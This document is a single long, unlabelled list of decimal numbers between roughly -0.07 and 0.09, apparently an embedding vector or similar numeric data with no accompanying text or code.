0.025273067876696587, 0.006913465913385153, -0.015208099037408829, 0.038459017872810364, 0.049294691532850266, 0.0011388905113562942, 0.021472951397299767, -0.058909446001052856, 0.018756400793790817, -0.014597638510167599, 0.0010501829674467444, 0.027302850037813187, 0.007905464619398117, -0.018924277275800705, 0.04032092168927193, -0.012674687430262566, 0.012087119743227959, 0.021244028583168983, -0.0035235020332038403, -0.007348419167101383, 0.017550742253661156, -0.010911982506513596, -0.002422765363007784, -0.0007597372750751674, 0.014399238862097263, 0.0018800278194248676, 0.012102381326258183, 0.01642138883471489, 0.006241959519684315, -0.024342115968465805, -0.009820784442126751, 0.004315193276852369, -0.010499921627342701, -0.019229508936405182, 0.01294939499348402, 0.007104234769940376, -0.011346936225891113, 0.012934133410453796, 0.015826189890503883, 0.03702443465590477, 0.011461397632956505, 0.007813895121216774, 0.005169838201254606, 0.015452283434569836, 0.02049621380865574, -0.006848604418337345, -0.014681576751172543, -0.010187060572206974, 0.01248391903936863, -0.014864714816212654, -0.005990144331008196, -0.007497218903154135, 0.011766627430915833, 0.00048026078729890287, 0.002680303528904915, 0.002134704263880849, -0.0014050131430849433, 0.01071358285844326, 0.023914793506264687, -0.0203435979783535, 0.015093637630343437, -0.00350824068300426, -0.01816120184957981, 0.03201865777373314, -0.0015938744181767106, -0.018237508833408356, -0.007745218463242054, 0.012354196049273014, -0.010850937105715275, -0.0325680710375309, -0.07136283814907074, 0.012667057104408741, 0.0033727947156876326, 0.011652166023850441, 0.004006147384643555, -0.04892841354012489, 0.006425097584724426, -0.024616822600364685, -0.010683059692382812, 0.0028100262861698866, 0.0049103922210633755, -0.07233957946300507, 0.03754332661628723, -0.023975839838385582, 0.029088446870446205, 0.013720101676881313, 0.015223360620439053, 0.0033556255511939526, 0.007344604004174471, -0.009553708136081696, -0.007230142597109079, 0.02238864079117775, -0.0019487045938149095, -0.005677283275872469, -0.004624238703399897, 0.012354196049273014, 0.005318637937307358, -0.009874199517071247, 0.013391979038715363, 0.020648829638957977, 0.007836787961423397, 0.009042447432875633, 0.000595675955992192, 0.016711357980966568, -0.02765386365354061, 0.02183922752737999, 0.039924122393131256, 0.010255737230181694, 0.0013277517864480615, -0.011583489365875721, 0.005833713803440332, 0.027211280539631844, -0.021396642550826073, 0.02426580712199211, -0.03867267817258835, 0.008042817935347557, 0.0076307570561766624, 0.006764666177332401, -0.006600604858249426, -0.05344582349061966, 0.009378200396895409, 0.0034395637921988964, 0.010225214995443821, -0.006596789695322514, 0.009225585497915745, 0.005982513539493084, 0.0005050607142038643, 0.0015671667642891407, -0.0010435060830786824, -0.010538076050579548, 0.029790475964546204, 0.014887607656419277, 0.025334114208817482, 0.011308781802654266, 0.006322082132101059, -0.0013363363686949015, 0.010751737281680107, -0.009462138637900352, -0.014803669415414333, 0.028966354206204414, 0.003941285889595747, 0.008393832482397556, -0.014727361500263214, 0.021747658029198647, 0.003983255475759506, -0.027150234207510948, -0.023411162197589874, 0.039679937064647675, 0.013742993585765362, -0.005459806881844997, 0.030828259885311127, -0.007806264795362949, -0.023090671747922897, -0.011789520271122456, -0.013102009892463684, -0.011545335873961449, 0.030812997370958328, -0.014651053585112095, 0.015192837454378605, 0.017596526071429253, -0.009217954240739346, 0.018756400793790817, 0.0040290397591888905, 0.008264110423624516, -0.03308696299791336, -0.006619682069867849, 0.02277017943561077, -0.01858852431178093, 0.005646760109812021, 0.04706650972366333, -0.002645964967086911, -0.0013639978133141994, 0.008615124970674515, 0.03549828380346298, -0.010690690949559212, 0.03345324099063873, 0.016055112704634666, -0.04328165575861931, -0.03714652732014656, -0.029729429632425308, 0.017169203609228134, -0.008866939693689346, 0.024189500138163567, -0.014231362380087376, 0.026280328631401062, -0.017581265419721603, 0.03165237978100777, 0.004162577912211418, 0.0019782737363129854, -0.01602458953857422, 0.0027375342324376106, 0.01499443780630827, -0.004727254156023264, -0.018924277275800705, 0.020114675164222717, -0.006329712923616171, 0.005421652924269438, 0.039649415761232376, 0.031133489683270454, -0.010889090597629547, -0.008195432834327221, 0.008576971478760242, -0.009011924266815186, 0.012094750069081783, 0.018069632351398468, -0.019305815920233727, -0.019839968532323837, 0.04398368299007416, -0.013575117103755474, -0.0017197818960994482, -0.014467915520071983, 0.018252771347761154, -0.009660538285970688, -0.0189853236079216, -0.05817689374089241, 0.013056225143373013, -0.03232388570904732, -0.023685870692133904, -0.018420647829771042, 0.02835589461028576, -0.028981616720557213, 0.009172170422971249, 0.012911241501569748, -0.024174239486455917, 0.012918871827423573, -0.0009209369891323149, -0.013040964491665363, 0.0055208527483046055, -0.011278259567916393, -0.030049921944737434, -0.00827174074947834, 0.002991256769746542, -0.02997361496090889, -0.016482435166835785, -0.029271584004163742, 0.01710815727710724, -0.022205503657460213, 0.014536592178046703, -0.02185448817908764, -0.026631342247128487, -0.03281225636601448, 0.006799004506319761, 0.006882943212985992, -0.015612529590725899, -0.0002680303587112576, 0.024571038782596588, 0.029363153502345085, -0.012720472179353237, -0.03037041425704956, -0.01829855516552925, -0.01335382554680109, 0.027211280539631844, -0.004757777322083712, 0.0007153835031203926, 0.01004207693040371, -0.011026443913578987, 0.009294262155890465, 0.020160460844635963, 0.00895850919187069, 0.00942398514598608, -0.03165237978100777, -0.019733138382434845, 0.007611680310219526, -0.02333485521376133, -0.014658684842288494, 0.025318851694464684, 0.012895979918539524, -0.01065253745764494, 0.0013649517204612494, -0.01669609732925892, -0.001436490099877119, -0.023105932399630547, 0.002022150671109557, -0.02808118611574173, -0.032354410737752914, 0.005467437673360109, 0.006371682044118643, 0.021671351045370102, 0.015101268887519836, 0.03415526822209358, -0.026539772748947144, 0.0011055059731006622, -0.012262626551091671, -0.014612900093197823, 0.009752107784152031, -0.035070959478616714, -0.020587783306837082, 0.012171057984232903, 0.00881352461874485, 0.03598665073513985, -0.020801443606615067, 0.006520482245832682, 0.0019487045938149095, 0.018237508833408356, -0.023670608177781105, -0.006119867321103811, 0.038459017872810364, -0.012628903612494469, 0.025975096970796585, -0.01078225951641798, -0.025150975212454796, 0.00834041740745306, 0.01099592074751854, -0.004025224596261978, 0.019870491698384285, -0.018084894865751266, 0.008805893361568451, 0.003342271549627185, 0.013674316927790642, 0.00794361811131239, -0.007836787961423397, 0.009431615471839905, 0.009317154996097088, -0.027852263301610947, 0.02359430119395256, -0.007237773388624191, -0.03162185847759247, -0.012361826375126839, 0.010812782682478428, 0.0027985800988972187, 0.008523555472493172, -0.01831381767988205, 0.035864558070898056, 0.024922052398324013, -0.011995550245046616, 0.016512958332896233, 0.01680292747914791, -0.013681947253644466, -0.006135128904134035, 0.004410577472299337, 0.0051126074977219105, 0.0052156224846839905, -0.012369457632303238, 0.0052156224846839905, 0.0058184522204101086, -0.010095492005348206, 0.007356049958616495, -0.01736760325729847, -0.011415612883865833, 0.017184466123580933, -0.02577669732272625, -0.037787508219480515, 0.01336908619850874, -0.017153942957520485, -0.0071881734766066074, -0.035345666110515594, -0.019717875868082047, -0.03076721355319023, -0.019717875868082047, 0.015490436926484108, 0.02792857214808464, -0.022159717977046967, 0.0018037202535197139, 0.012216842733323574, 0.020313074812293053, -0.016238251700997353, 0.007684172596782446, -0.021198242902755737, 0.008737216703593731, 0.05356791615486145, -0.0017808279953897, 0.03870319947600365, 0.04489937424659729, -0.0006777066155336797, 0.023930054157972336, 0.028310108929872513, -0.0023083039559423923, 0.013804039917886257, -0.028096448630094528, 0.0007082296651788056, 0.010980659164488316, 0.013727732002735138, 0.021121935918927193, -0.026493988931179047, -0.0057841138914227486, 0.016787664964795113, 0.004773038439452648, 0.009584231302142143, -0.011804780922830105, 0.0015833821380510926, -0.012773887254297733, -0.006184728816151619, -0.0084854019805789, 0.006585343275219202, -0.01126299798488617, -0.022174980491399765, 0.011293520219624043, 0.031209796667099, 0.022419163957238197, 0.011003552004694939, 0.006180913187563419, -0.0006242913077585399, -0.015024960972368717, 0.0022091041319072247, 0.002695564879104495, -0.008592233061790466, 0.003834455506876111, -0.006985958199948072, -0.011423243209719658, 0.04492989927530289, -0.004616607911884785, 0.01993153803050518, -0.019183723255991936, 0.006161836441606283, -0.027913309633731842, 0.0033823330886662006, 0.029378416016697884, -0.01539123710244894, -0.006890573538839817, 0.0007077527116052806, -0.008431986905634403, -0.001164644374512136, -0.013384347781538963, -0.0016768588684499264, 0.007890203036367893, -0.00048526847967877984, 0.02144242823123932, 0.012285519391298294, 0.004925653804093599, -0.012110011652112007, -0.018893754109740257, 0.0028405494522303343, -0.028310108929872513, 0.009927615523338318, 0.00403285538777709, -0.000020239391233189963, -0.02019098401069641, 0.006753220222890377, -0.007363680750131607, 0.005085899494588375, -0.0004301839508116245, 0.00471199257299304, -0.009240847080945969, -0.0284932479262352, 0.0053758686408400536, -0.0009853214723989367, -0.017031850293278694, -0.02263282611966133, -0.014635792002081871, -0.028981616720557213, 0.023029625415802002, -0.013895608484745026, -0.0014097824459895492, 0.013933762907981873, 0.089554563164711, -0.008752478286623955, 0.009111124090850353, 0.00117799814324826, -0.02304488606750965, -0.0017178741982206702, 0.010324414819478989, -0.01031678356230259, 0.009462138637900352, -0.007417095825076103, 0.0009080601157620549, 0.025318851694464684, -0.0064365435391664505, -0.006226697936654091, 0.009958137758076191, 0.028813738375902176, -0.027455464005470276, -0.002123258076608181, 0.02075565978884697, -0.006631128024309874, -0.004452546592801809, 0.01791701838374138, -0.009088232181966305, 0.03198813274502754, 0.023731654509902, -0.0084854019805789, -0.019504215568304062, -0.022327596321702003, -0.009981030598282814, -0.0065700821578502655, 0.0002952149079646915, 0.004895130638033152, -0.01910741627216339, -0.026493988931179047, -0.030294105410575867, -0.0054521760903298855, 0.035193052142858505, 0.026356635615229607, 0.003933655563741922, -0.027989616617560387, -0.004555562045425177, -0.013483547605574131, -0.03107244335114956, 0.007241588551551104, -0.02577669732272625, -0.006940173450857401, -0.001457474660128355, 0.013727732002735138, -0.043190084397792816, 0.011079858988523483, -0.0008532140636816621, -0.031011397019028664, -0.017321819439530373, 0.03189656510949135, 0.020145198330283165, 0.005158391781151295, -0.02357904054224491, -0.0003584071237128228, 0.012422872707247734, -0.007882571779191494, 0.002659318968653679, 0.012178688310086727, -0.0012581211049109697, 0.010805152356624603, 0.006837158463895321, -0.009981030598282814, -0.034124746918678284, -0.007649834267795086, -0.036017175763845444, 0.032476503401994705, 0.00025563035160303116, 0.003592178924009204, 0.009324785321950912, -0.01817646436393261, -0.010667798109352589, -0.010324414819478989, -0.008576971478760242, 0.006348790135234594, -0.012651795521378517, -0.021244028583168983, 0.00011744211951736361, 0.019076893106102943, -0.0189853236079216, 0.015230990946292877, -0.005085899494588375, 0.021198242902755737, -0.013079117983579636, -0.009172170422971249, -0.026356635615229607, -0.018252771347761154, -0.02643294259905815, -0.020389383658766747, 0.011507181450724602, 0.009729215875267982, 0.009981030598282814, -0.0015871975338086486, 0.011140905320644379, -0.017932279035449028, 0.003325102385133505, -0.0015614436706528068, -0.015528591349720955, -0.0013029518304392695, 0.005013407673686743, -0.02481522224843502, -0.007543003652244806, 0.005333899054676294, 0.00956896971911192, -0.014437392354011536, -0.015414129942655563, -0.003824917133897543, -0.012529702857136726, 0.002155688824132085, 0.017474433407187462, 0.0037428864743560553, 0.009851307608187199, 0.007615495473146439, 0.011751365847885609, -0.034521546214818954, 0.00357882515527308, -0.03894738480448723, -0.011896350421011448, 0.014216100797057152, 0.019168462604284286, -0.06159547343850136, 0.01777966506779194, 0.02306014858186245, 0.010774629190564156, -0.006226697936654091, 0.03500991314649582, 0.025929313153028488, -0.007031742949038744, 0.019717875868082047, 0.03500991314649582, -0.0040290397591888905, -0.004906577058136463, -0.003246887121349573, 0.027012880891561508, -0.0016348897479474545, -0.016192466020584106, 0.008424355648458004, -0.011614012531936169, 0.04370897635817528, 0.008431986905634403, -0.014200839214026928, 0.024494729936122894, -0.013269886374473572, -0.00001212426013807999, 0.016848711296916008, 0.01553622167557478, -0.00045856082579120994, 0.014322930946946144, -0.03842849284410477, 0.01709289662539959, 0.004895130638033152, 0.001743628061376512, -0.04087033495306969, 0.010026815347373486, -0.0005298607284203172, -0.021381381899118423, 0.04233543947339058, -0.018069632351398468, -0.004567007999867201, 0.0196873527020216, -0.05643707886338234, 0.028310108929872513, 0.0021671350114047527, -0.000034248983865836635, -0.01092724408954382, -0.006951619870960712, -0.004891315475106239, -0.00242658075876534, 0.0008555986569263041, 0.01912267692387104, -0.010477029718458652, 0.029378416016697884, 0.01513179112225771, 0.003531132824718952, -0.002937841461971402, 0.012957025319337845, -0.015520960092544556, -0.024708392098546028, 0.0061313132755458355, 0.004692915827035904, 0.006596789695322514, 0.00834804866462946, 0.0018905200995504856, 0.009881830774247646, -0.020297814160585403, -0.0284779854118824, 0.02524254471063614, 0.017550742253661156, 0.014544223435223103, 0.0037810401991009712, 0.004303746856749058, 0.011965027078986168, -0.032873302698135376, 0.004177839495241642, -0.010118383914232254, 0.003813470946624875, -0.0072835576720535755, -0.01111801341176033, 0.011278259567916393, 0.0016501512145623565, -0.024906791746616364, -0.006158021278679371, -0.04825690761208534, -0.027760693803429604, -0.000606645189691335, -0.01831381767988205, 0.00042517625843174756, -0.0022358119022101164, -0.004601346794515848, -0.005154576618224382, 0.0013182132970541716, 0.029912568628787994, 0.004681469406932592, -0.0006457528215833008, -0.040076736360788345, -0.01668083481490612, -0.011758997105062008, 0.008653278462588787, -0.015643052756786346, -0.01240761112421751, -0.01194213517010212, -0.019473692402243614, -0.011385089717805386, 0.0023998732212930918, -0.009347677230834961, -0.003956547472625971, 0.0017045204294845462, -0.022007104009389877, -0.006913465913385153, 0.015826189890503883, 0.014025331474840641, -0.01065253745764494, -0.02115245908498764, -0.008912724442780018, -0.008454878814518452, -0.012667057104408741, 0.01165979728102684, -0.0005336760659702122, -0.0075201112776994705, -0.017169203609228134, 0.016909757629036903, 0.014498438686132431, -0.0002718457253649831, 0.02074039727449417, 0.020007845014333725, -0.015337822027504444, 0.004811192397028208, -0.010393091477453709, 0.021518735215067863, 0.008088602684438229, -0.003304117824882269, -0.0006681681843474507, -0.020160460844635963, 0.010393091477453709, -0.001502305269241333, -0.01201081182807684, -0.015292037278413773, 0.03488782048225403, 0.0065700821578502655, -0.017947541549801826, 0.014300039038062096, 0.004788300022482872, 0.027302850037813187, -0.011354566551744938, -0.010705952532589436, 0.004670023452490568, 0.01710815727710724, -0.0048417155630886555, -0.0027795033529400826, -0.01336908619850874, -0.0036913787480443716, 0.0031095335725694895, -0.0036398712545633316, 0.003342271549627185, -0.008355678990483284, -0.010705952532589436, 0.0024246731773018837, -0.009134015999734402, 0.03009570576250553, 0.02496783807873726, -0.021869750693440437, -0.004154947120696306, -0.013483547605574131, -0.029622599482536316, -0.0018676278414204717, -0.009912353940308094, -0.010019184090197086, -0.0010234753135591745, -0.021213505417108536, -0.006093159783631563, -0.003246887121349573, 0.009973399341106415, 0.004009963013231754, 0.0015719359507784247, 0.012857825495302677, 0.014277147129178047, -0.002647872781381011, -0.014948653057217598, 0.030553551390767097, 0.014628161676228046, -0.01118669006973505, -0.02046569064259529, -0.0230754092335701, -0.019458431750535965, 0.012132903560996056, 0.005845160223543644, 0.011644535697996616, 0.010469398461282253, 0.017062373459339142, -0.035620372742414474, -0.013056225143373013, -0.0036589480005204678, -0.01910741627216339, -0.012163426727056503, -0.004036670550704002, -0.005330083891749382, -0.02142716571688652, 0.032201796770095825, -0.020374121144413948, -0.006657835561782122, 0.014666315168142319, -0.01370484009385109, 0.0022472580894827843, -0.028004879131913185, -0.003914578352123499, -0.00888983253389597, -0.0022911347914487123, 0.006791373714804649, 0.011316413059830666, 0.012918871827423573, 0.009721584618091583, -0.010690690949559212, -0.012232103385031223, 0.014391608536243439, -0.032873302698135376, -0.02591405063867569, 0.012048965319991112, -0.03272068500518799, 0.02142716571688652, 0.0048760538920760155, -0.009378200396895409, 0.015360713936388493, -0.01370484009385109, 0.04178602620959282, 0.0011245828354731202, -0.005471252836287022, -0.015688836574554443, 0.00471199257299304, -0.012873087078332901, -0.02605140581727028, -0.002422765363007784, 0.027180757373571396, 0.007611680310219526, 0.01939738541841507, -0.02537989802658558, 0.014292407780885696, -0.05588766559958458, -0.008615124970674515, -0.03513200581073761, -0.019611045718193054, -0.004437285475432873, -0.012377087958157063, -0.0393441841006279, -0.009614754468202591, 0.005318637937307358, 0.03855058550834656, 0.01652822084724903, -0.0056887296959757805, -0.027638603001832962, 0.03354480862617493, 0.0042579625733196735, -0.0019820891320705414, -0.02063356712460518, 0.02238864079117775, -0.011980288662016392, -0.015841452404856682, 0.029073184356093407, -0.008821154944598675, 0.014963914640247822, 0.0013258440885692835, -0.01553622167557478, 0.014651053585112095, -0.010599121451377869, -0.013170686550438404, -0.013002810068428516, -0.017459172755479813, -0.012056596577167511, -0.0024246731773018837, 0.006081713363528252, 0.015475175343453884, 0.0298515222966671, -0.0006786604644730687, 0.014948653057217598, -0.010492291301488876, -0.0013601824175566435, -0.0030771028250455856, -0.0033479947596788406, -0.010370198637247086, -0.03650554269552231, 0.0025563037488609552, 0.019046369940042496, 0.024067407473921776, 0.011156166903674603, -0.014551853761076927, -0.03177447244524956, 0.008164910599589348, -0.013598009012639523, 0.021808704361319542, -0.020969320088624954, -0.022480210289359093, -0.019580522552132607, -0.02075565978884697, 0.00726066529750824, 0.004654761869460344, 0.044136300683021545, 0.022556519135832787, -0.026524512097239494, -0.011667427606880665, -0.011781889013946056, 0.017062373459339142, -0.012186319567263126, -0.013384347781538963, -0.015017329715192318, 0.0017131050117313862, -0.03078247420489788, -0.04514355957508087, 0.0016844896599650383, -0.006303005386143923, -0.012590749189257622, 0.011697950772941113, -0.013956654816865921, 0.01764230988919735, -0.004341900814324617, 0.019778922200202942, -0.006104605738073587, -0.020694613456726074, 0.01308674830943346, 0.016741881147027016, 0.0016730434726923704, -0.01574988290667534, 0.001509936060756445, -0.009248477406799793, 0.0019315354293212295, -0.003540671430528164, -0.0019162738462910056, -0.0075887879356741905, -0.003821101738139987, 0.02156451903283596, 0.015169945545494556, 0.01680292747914791, 0.02441842295229435, 0.004822638351470232, -0.004624238703399897, -0.0036627633962780237, 0.004555562045425177, 0.0011055059731006622, -0.0009175985469482839, 0.0043609775602817535, -0.018802186474204063, 0.005761221516877413, -0.0010311061050742865, 0.017871232703328133, -0.014330562204122543, 0.018527477979660034, 0.004215993452817202, -0.009622384794056416, -0.007523926440626383, 0.013254624791443348, -0.02536463737487793, 0.018268031999468803, -0.0012972287368029356, -0.007607865147292614, -0.0003781994164455682, -0.030889304354786873, -0.01241524238139391, 0.002928303088992834, -0.0010148907313123345, 0.01193450391292572, 0.024616822600364685, 0.004608977120369673, -0.019229508936405182, -0.010057337582111359, 0.02603614330291748, -0.00467765424400568, 0.006966881453990936, 0.016436651349067688, 0.004692915827035904, 0.0041892859153449535, -0.024189500138163567, -0.013567485846579075, 0.006306821014732122, 0.005036299582570791, 0.0003154841251671314, 0.0003202533407602459, 0.004044301342219114, 0.00001718410749163013, 0.01599406637251377, -0.011247736401855946, -0.011430874466896057, -0.011163798160851002, 0.004967622924596071, 0.006825712509453297, 0.0003309840976726264, -0.014536592178046703, 0.021396642550826073, 0.008783001452684402, -0.0036322404630482197, 0.00044878391781821847, -0.000883737055119127, -0.01355985552072525, -0.0054178377613425255, -0.017566002905368805, -0.0012676595943048596, 0.004128239583224058, -0.01004207693040371, 0.016909757629036903, -0.0051049767062067986, 0.0006881988956592977, -0.006825712509453297, -0.008027556352317333, -0.013079117983579636, -0.01912267692387104, 0.011598750948905945, 0.015375975519418716, 0.004380054771900177, -0.0051393150351941586, -0.033422715961933136, 0.0011093213688582182, 0.00010492291039554402, 0.003582640551030636, -0.008187802508473396, 0.003779132617637515, -0.015704099088907242, 0.027760693803429604, -0.004460177384316921, -0.00009150947153102607, -0.006757035385817289, 0.0013935670722275972, -0.016299298033118248, -0.0048073772341012955, 0.022022364661097527, 0.0005575221730396152, 0.00808097142726183, 0.006322082132101059, -0.02602088265120983, 0.0027966725174337626, 0.015795666724443436, -0.000891844742000103, -0.007230142597109079, 0.0024990730453282595, -0.005787929520010948, 0.015902498736977577, -0.002922580111771822, 0.010377829894423485, -0.005551375914365053, -0.0006352605414576828, 0.002058396814391017, 0.00025348420604132116, 0.01993153803050518, 0.010545706376433372, -0.003204918000847101, 0.00942398514598608, 0.0006591066485270858, -0.0031763026490807533, -0.01214816514402628, 0.0003531609836500138, -0.011621642857789993, 0.003231625771149993, -0.002953103045001626, -0.023380640894174576, 0.003933655563741922, -0.017581265419721603, 0.010126015171408653, 0.007275926880538464, 0.005814637057483196, 0.026906050741672516, -0.010263368487358093, 0.011240105144679546, 0.013666686601936817, -0.01585671305656433, -0.0018685816321521997, -0.03090456686913967, -0.015917759388685226, 0.005402576178312302, -0.0005575221730396152, 0.012651795521378517, 0.0045975311659276485, 0.0007840602775104344, -0.0008193525718525052, -0.023411162197589874, 0.018222248181700706, -0.020023107528686523, -0.003609348088502884, -0.030858781188726425, -0.008561709895730019, -0.0034052254632115364, 0.009225585497915745, -0.0039870706386864185, 0.013109641149640083, 0.023960577324032784, 0.001987812342122197, -0.007718510925769806, -0.008294632658362389, 0.0016625511925667524, 0.01369720883667469, 0.00762694189324975, -0.015902498736977577, 0.008905093185603619, 0.01614668220281601, -0.004635685123503208, -0.0013887977693229914, -0.009851307608187199, -0.005150760989636183, -0.004918023012578487, -0.010766998864710331, 0.007218696177005768, -0.015009699389338493, 0.014353454113006592, -0.005204176530241966, -0.002029781462624669, 0.00045450698235072196, -0.008599863387644291, 0.002125165890902281, -0.008393832482397556, -0.023975839838385582, 0.009378200396895409, 0.030416198074817657, 0.011514812707901001, -0.004074824508279562, -0.0006285835988819599, 0.008989032357931137, 0.012308411300182343, 0.02684500440955162, -0.008691432885825634, -0.0024456577375531197, -0.02277017943561077, -0.011301151476800442, -0.01369720883667469, -0.006959250662475824, -0.002016427693888545, -0.014353454113006592, -0.03729914128780365, 0.006985958199948072, 0.007302634418010712, -0.003191564232110977, 0.01924476958811283, 0.01926003023982048, -0.0038821478374302387, 0.016909757629036903, -0.007958879694342613, -0.009156908839941025, 0.00016000744653865695, -0.019214246422052383, -0.012445764616131783, 0.0156048983335495, -0.0028596261981874704, -0.0052499608136713505, -0.01655874401330948, 0.008546448312699795, 0.016741881147027016, -0.0002992687514051795, 0.010278630070388317, -0.007741403300315142, -0.02154925838112831, 0.006787558551877737, 0.002918764716014266, 0.004410577472299337, -0.004376239143311977, 0.005509406793862581, -0.013941393233835697, -0.012399980798363686, -0.029378416016697884, -0.015505698509514332, 0.019153200089931488, 0.012399980798363686, 0.0010005830554291606, 0.007279742509126663, -0.01010312233120203, 0.004998146090656519, 0.003367071505635977, -0.004132055211812258, 0.006654020398855209, -0.000060539328842423856, 0.014345823787152767, -0.023105932399630547, -0.01038546022027731, -0.0027222726494073868, 0.0016072281869128346, 0.008912724442780018, 0.023411162197589874, -0.00478448485955596, -0.005337714683264494, -0.053934190422296524, -0.016039852052927017, 0.00895850919187069, -0.02644820511341095, 0.0022014733403921127, 0.004509777296334505, 0.0022663348354399204, 0.00963764637708664, -0.012300780974328518, 0.010003922507166862, -0.008149649016559124, 0.0010749829234555364, -0.011629274114966393, 0.007859679870307446, -0.0017007050337269902, 0.019626308232545853, 0.00597106758505106, 0.013872716575860977, 0.010766998864710331, -0.016894496977329254, 0.007672726176679134, -0.008874570950865746, 0.023151718080043793, 0.029744692146778107, 0.004986699670553207, -0.01038546022027731, 0.012911241501569748, -0.010141276754438877, -0.04572349786758423, -0.003784855594858527, 0.007958879694342613, 0.008225956000387669, -0.01302570290863514, -0.01417794730514288, -0.001150336698628962, 0.040900859981775284, 0.007958879694342613, 0.007409465033560991, -0.011110382154583931, -0.000025023518901434727, -0.006932543125003576, -0.004456362221390009, 0.0028920569457113743, -0.018252771347761154, -0.016253512352705002, 0.019580522552132607, -0.002418949967250228, -0.01193450391292572, 0.010919613763689995, -0.007161465473473072, 0.008912724442780018, 0.01431530062109232, 0.009523184970021248, -0.0059329136274755, 0.01613142155110836, -0.010843305848538876, -0.005265222396701574, -0.00003833263326669112, -0.014887607656419277, 0.01857326366007328, -0.000893752439878881, -0.019229508936405182, 0.004082455299794674, 0.0016387051437050104, 0.01301807165145874, 0.009698692709207535, 0.012171057984232903, -0.01111801341176033, 0.00794361811131239, 0.024311592802405357, -0.003866886254400015, -0.011743735522031784, 0.002998887561261654, -0.019977321848273277, -0.015292037278413773, 0.0037028249353170395, 0.006303005386143923, 0.018680093809962273, 0.009752107784152031, 0.0071881734766066074, -0.001219967263750732, -0.013216471299529076, -0.027363894507288933, 0.0005379683570936322, -0.023258548229932785, -0.0019239046378061175, 0.006890573538839817, -0.035223573446273804, -0.0004669069603551179, 0.04398368299007416, -0.0004728684725705534, 0.004830269142985344, 0.0046318694949150085, 0.014162685722112656, -0.0004120608791708946, 0.020252030342817307, -0.007024112157523632, 0.024479469284415245, 0.013071486726403236, -0.009942876175045967, -0.01064490620046854, 0.007821526378393173, 0.002359811682254076, -0.0016825819620862603, -0.014742623083293438, -0.004151131957769394, -0.03427736088633537, -0.029866782948374748, 0.007455249782651663, 0.0018781201215460896, 0.015551483258605003, 0.005154576618224382, 0.011713212355971336, 0.0000906152417883277, -0.00589857529848814, -0.006135128904134035, -0.0022701502311974764, 0.0007840602775104344, 0.006520482245832682, -0.0031438719015568495, -0.0001514228351879865, -0.021228766068816185, 0.0019506122916936874, 0.026906050741672516, 0.005974882747977972, -0.0008570294012315571, -0.017855972051620483, 0.01927529275417328, 0.007279742509126663, 0.009225585497915745, -0.020374121144413948, -0.010759367607533932, -0.014132162556052208, -0.0009161678026430309, -0.023426424711942673, -0.026371896266937256, 0.00413587037473917, -0.027073927223682404, -0.025044145062565804, -0.020526736974716187, -0.020374121144413948, -0.01546754501760006, -0.007241588551551104, -0.00008978063124231994, -0.0025791958905756474, 0.005490329582244158, 0.01967209205031395, -0.002386519219726324, -0.0034033176489174366, -0.004990515299141407, -0.01843590848147869, -0.005997775122523308, -0.006180913187563419, 0.005230884067714214, -0.026219282299280167, 0.012453395873308182, -0.0054445452988147736, -0.008027556352317333, -0.006222882308065891, 0.0012342749396339059, 0.005665837321430445, 0.019824707880616188, -0.03201865777373314, -0.020679352805018425, 0.004422023892402649, 0.003239256329834461, 0.00028186108102090657, 0.02455577626824379, -0.01146902795881033, -0.0020107044838368893, 0.011827673763036728, -0.013941393233835697, 0.005192730110138655, -0.021762918680906296, 0.007569711189717054, 0.022083410993218422, 0.008172540925443172, -0.006810450926423073, 0.027577556669712067, 0.005871867761015892, -0.013140164315700531, -0.006902019958943129, 0.009958137758076191, -0.03891686350107193, -0.015368345193564892, 0.02942419983446598, -0.008775371126830578, 0.0028615340124815702, -0.003901224583387375, -0.005345345474779606, -0.011362197808921337, 0.005837529432028532, -0.002064119791612029, 0.012567857280373573, -0.0059367292560637, -0.0024952576495707035, 0.010980659164488316, -0.01829855516552925, 0.009431615471839905, 0.023090671747922897, -0.005276668816804886, 0.002335011726245284, -0.019717875868082047, 0.006150390487164259, 0.027348633855581284, -0.009294262155890465, -0.0030675644520670176, 0.008264110423624516, 0.009767369367182255, -0.007867311127483845, -0.008966139517724514, 0.013407240621745586, -0.005257591605186462, 0.013643793761730194, 0.002365534659475088, -0.006997404154390097, -0.0018294740002602339, 0.009393461979925632, -0.002630703616887331, 0.014017701148986816, -0.009126385673880577, -0.014445023611187935, -0.026204019784927368, 0.02359430119395256, 0.010843305848538876, 0.02562408335506916, -0.004219808615744114, 0.006852420046925545, 0.014467915520071983, 0.019366862252354622, -0.0074514346197247505, 0.02304488606750965, 0.0028062108904123306, -0.002384611638262868, 0.011415612883865833, 0.01599406637251377, 0.008073341101408005, -0.011110382154583931, 0.016177205368876457, -0.027058664709329605, 0.03348376229405403, 0.010477029718458652, -0.028996877372264862, 0.017855972051620483, -0.011018813587725163, 0.019458431750535965, -0.0016215358627960086, 0.005543745122849941, -0.0005093530635349452, 0.007897833362221718, -0.02141190506517887, -0.011789520271122456, -0.012918871827423573, 0.009576600044965744, 0.020023107528686523, -0.005738329607993364, -0.006352605298161507, -0.00769943417981267, -0.023487471044063568, -0.006371682044118643, 0.002955010626465082, -0.004479254595935345, 0.02995835244655609, 0.024632085114717484, -0.021762918680906296, -0.020007845014333725, 0.020938796922564507, 0.0007511526346206665, 0.010454137809574604, 0.017566002905368805, 0.005387314595282078, -0.02385374717414379, 0.008325155824422836, -0.0023197501432150602, 0.016604527831077576, 0.009080600924789906, -0.007287373300641775, 0.004601346794515848, -0.024906791746616364, 0.02644820511341095, 0.001825658604502678, 0.00025205346173606813, 0.004948546178638935, -0.007413280662149191, 0.015627790242433548, -0.0271197110414505, 0.013674316927790642, -0.0011541519779711962, 0.0031553180888295174, -0.012651795521378517, -0.012087119743227959, -0.0034452867694199085, -0.004338085651397705, 0.02386900782585144, -0.004212177824229002, -0.0055551910772919655, -0.022297073155641556, 0.01587197557091713, -0.0037180865183472633, 0.003277410287410021, -0.010683059692382812, 0.024769438430666924, -0.002724180230870843, -0.011056967079639435, -0.012453395873308182, 0.030706167221069336, -0.010019184090197086, 0.017062373459339142, 0.00808097142726183, 0.01602458953857422, -0.01484945323318243, -0.01452133059501648, 0.010026815347373486, -0.0072225118055939674, 0.013918501324951649, -0.006325897760689259, 0.015978805720806122, -0.025318851694464684, 0.004387685563415289, 0.01774914190173149, -0.00040252244798466563, 0.00045736850006505847, 0.01774914190173149, 0.016986064612865448, -0.0018838432151824236, 0.0009481215965934098, 0.022541256621479988, 0.012140534818172455, 0.019977321848273277, -0.020954059436917305, -0.006585343275219202, -0.012506810948252678, -0.04013778269290924, 0.014063485898077488, -0.010240476578474045, -0.004654761869460344, -0.000021074005417176522, 